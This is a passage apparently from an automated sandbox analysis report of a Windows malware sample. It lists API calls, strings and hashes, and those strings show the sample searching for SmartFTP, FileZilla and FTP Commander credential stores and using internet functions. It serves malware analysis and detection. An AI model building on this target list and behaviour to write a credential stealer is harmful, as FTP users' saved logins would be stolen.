                  • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                  • API String ID: 3923277744-821743658
                  • Opcode ID: 9c5624b750c48fe949610555ae12c1d7776d2d53775f7ef2d3d96991cebe07cb
                  • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                  • Opcode Fuzzy Hash: 9c5624b750c48fe949610555ae12c1d7776d2d53775f7ef2d3d96991cebe07cb
                  • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 0040A0C0
                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                  • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: CreateHandleInitializeModuleWindow
                  • String ID: AtlAxWin$Shell.Explorer
                  • API String ID: 950422046-1300462704
                  • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                  • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                  • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                  • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                  • CharLowerW.USER32(?), ref: 0040ABA0
                  • GetCommandLineW.KERNEL32 ref: 0040ABC0
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: CharCommandFileLineLowerModuleName
                  • String ID: /updatefile3$netprotdrvss.exe
                  • API String ID: 3118597399-3449771660
                  • Opcode ID: 61670428bc38f3e4eb0be7325e100114f65b6339bc855a7a328cdb887f7470a6
                  • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                  • Opcode Fuzzy Hash: 61670428bc38f3e4eb0be7325e100114f65b6339bc855a7a328cdb887f7470a6
                  • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409FCE
                  • GetTickCount.KERNEL32 ref: 00409FDE
                  • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                  • DispatchMessageW.USER32(?), ref: 0040A009
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                  • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                  • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                  • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409F5B
                  • GetTickCount.KERNEL32 ref: 00409F5F
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                  • DispatchMessageW.USER32(?), ref: 00409F80
                  • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  • Opcode ID: d828153fe0bc3cb5942bd1ad65280cd53f53337ade4736ba602ea34c47e1e491
                  • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                  • Opcode Fuzzy Hash: d828153fe0bc3cb5942bd1ad65280cd53f53337ade4736ba602ea34c47e1e491
                  • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                  APIs
                    • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                    • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                    • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                    • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                    • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                    • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                    • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                  • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                  • SysFreeString.OLEAUT32(?), ref: 0040875A
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                  • String ID: http://$+@
                  • API String ID: 147727044-3628382792
                  • Opcode ID: 4747316a717284c04b6d8eaca9f6cad11a4be7da38afbfbb58d184a4dff8615e
                  • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                  • Opcode Fuzzy Hash: 4747316a717284c04b6d8eaca9f6cad11a4be7da38afbfbb58d184a4dff8615e
                  • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                  APIs
                  • SetFilePointer.KERNEL32(?,00000000,00000000,?,UniqueNum,00000000), ref: 00407E09
                  • WriteFile.KERNEL32(00000078,00000064,00000000,00000000), ref: 00407E20
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: File$CreateModuleNamePointerWrite
                  • String ID: UniqueNum$x
                  • API String ID: 594998759-2399716736
                  • Opcode ID: f714b27ee9317318c4b5ab7fa1cefed36b34d8c85c53bda1d1664fc5573218dc
                  • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                  • Opcode Fuzzy Hash: f714b27ee9317318c4b5ab7fa1cefed36b34d8c85c53bda1d1664fc5573218dc
                  • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?), ref: 00408280
                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                  • String ID: #$&$*filezilla*
                  • API String ID: 3438805939-758400021
                  • Opcode ID: b94badfc80f454930b4c4e7711f3c2cdfa3c780a60e708483a1590b16434435c
                  • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                  • Opcode Fuzzy Hash: b94badfc80f454930b4c4e7711f3c2cdfa3c780a60e708483a1590b16434435c
                  • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?), ref: 00408280
                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                  • String ID: #$&$ftp*commander*
                  • API String ID: 3438805939-1149875651
                  • Opcode ID: 5b274e86ecfa94f023ab10c4bc64147d8c024bc00b4ff254a4a9ffef51946c32
                  • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                  • Opcode Fuzzy Hash: 5b274e86ecfa94f023ab10c4bc64147d8c024bc00b4ff254a4a9ffef51946c32
                  • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094A9
                  • SysFreeString.OLEAUT32(?), ref: 004094AE
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: FreeString
                  • String ID: _blank$an.yandex.ru/count
                  • API String ID: 3341692771-25359924
                  • Opcode ID: 220b2bda2c3fa2e17afd3876e6e131a3eeacb4788efdd8cad2f7b8a0937d0ae5
                  • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                  • Opcode Fuzzy Hash: 220b2bda2c3fa2e17afd3876e6e131a3eeacb4788efdd8cad2f7b8a0937d0ae5
                  • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Open
                  • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                  • API String ID: 71445658-3061378640
                  • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                  • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                    • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                    • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                  • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                  • String ID:
                  • API String ID: 3604167287-0
                  • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                  • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                  • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                  • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                  APIs
                  • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                  • CharLowerW.USER32(00408795), ref: 004095D8
                  • SysFreeString.OLEAUT32(00408795), ref: 00409608
                  • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: CharFreeLowerString
                  • String ID:
                  • API String ID: 2335467167-0
                  • Opcode ID: a9b2d518bc86f0d25b60cd0557e0d7d5801712bcf914245b10683875f4897775
                  • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                  • Opcode Fuzzy Hash: a9b2d518bc86f0d25b60cd0557e0d7d5801712bcf914245b10683875f4897775
                  • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                  APIs
                  • GetSystemTime.KERNEL32(?,00000000,?), ref: 0040727C
                  • SystemTimeToFileTime.KERNEL32(?,?,00000000,?), ref: 004072C1
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                  • __aulldiv.LIBCMT ref: 004072E3
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID:
                  • API String ID: 3735792614-0
                  • Opcode ID: 0c4dc03f5a347e2c27f051dc2031945d9a04d2897cd941f14c1bc42406c11d92
                  • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                  • Opcode Fuzzy Hash: 0c4dc03f5a347e2c27f051dc2031945d9a04d2897cd941f14c1bc42406c11d92
                  • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                  APIs
                  • GetSystemTime.KERNEL32(?,00000000), ref: 004072F9
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                  • __aulldiv.LIBCMT ref: 00407359
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID:
                  • API String ID: 3735792614-0
                  • Opcode ID: 4f6d7255259d029fcefee0a6ef84dda989e1e538c9ce85064cb776bb0b095d3e
                  • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                  • Opcode Fuzzy Hash: 4f6d7255259d029fcefee0a6ef84dda989e1e538c9ce85064cb776bb0b095d3e
                  • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: -
                  • API String ID: 885266447-2547889144
                  • Opcode ID: 9768e3a2316649ce80f3092f0a8653cf88643bc84f5cb20062fd1d2db9b0b25f
                  • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                  • Opcode Fuzzy Hash: 9768e3a2316649ce80f3092f0a8653cf88643bc84f5cb20062fd1d2db9b0b25f
                  • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409868
                  • SysAllocString.OLEAUT32(?), ref: 00409876
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: AllocString
                  • String ID: "URL"
                  • API String ID: 2525500382-1734660058
                  • Opcode ID: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
                  • Instruction ID: a1d8355846c3e17605cb56d648b2f311708773d78851072204e2f77cd01d539a
                  • Opcode Fuzzy Hash: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
                  • Instruction Fuzzy Hash: E9F0A77650011997CF00AF64CC00ED637E9BB84348F0444B7E904E7240D974D9058F54
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004097ED
                  • SysAllocString.OLEAUT32(?), ref: 004097FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: AllocString
                  • String ID: "domain"
                  • API String ID: 2525500382-3540696003
                  • Opcode ID: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
                  • Instruction ID: 2ab7b57618223888890007651f958d72a6f850cfddda49e7e7e9e9b765f43e97
                  • Opcode Fuzzy Hash: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
                  • Instruction Fuzzy Hash: AEF0A776500119ABCF00AF64CC04ED677E8BB84308F1444A7F908E7240EA7499058F50